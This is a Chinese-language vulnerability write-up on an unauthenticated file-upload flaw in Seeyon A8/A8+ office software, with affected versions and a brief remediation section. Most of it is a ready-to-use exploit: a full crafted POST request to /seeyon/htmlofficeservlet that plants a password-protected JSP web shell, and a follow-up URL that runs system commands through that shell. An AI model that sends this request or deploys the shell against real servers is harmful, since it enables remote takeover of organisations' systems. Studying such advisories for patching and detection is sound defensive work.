01 漏洞描述 远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件，写入成功后可执行任意系统命令进而控制目标服务器。 02 影响范围 致远A8-V5协同管理软件V6.1sp1致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3致远A8+协同管理软件V7.1 03 验证方式 尝试访问路径/seeyon/htmlofficeservlet，出现如下图响应，则可能含有漏洞； 04 利用方式 1、构造如下数据包上传脚本文件： POST /seeyon/htmlofficeservlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 1120 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) { StringBuilder line = new StringBuilder();try { Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) { line.append(temp+"\n");}buf.close();} catch (Exception e) { line.append(e.getMessage());}return line.toString();} %><%if("calsee".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){ out.println("

"+excuteCmd(request.getParameter("cmd")) + "

");}else{out.println(":-)");}%>>a6e4f045d4b8506bf492ada7e3390d7ce 2、出现如下图响应则为上传成功 3、访问/seeyon/testtesta.jsp?pwd=calsee&cmd=cmd+/c+whoami,可执行系统命令 05 修复方案 1、对路径/seeyon/htmlofficeservlet进行访问限制。2、致远官方已发布补丁，请联系官方安装相应补丁。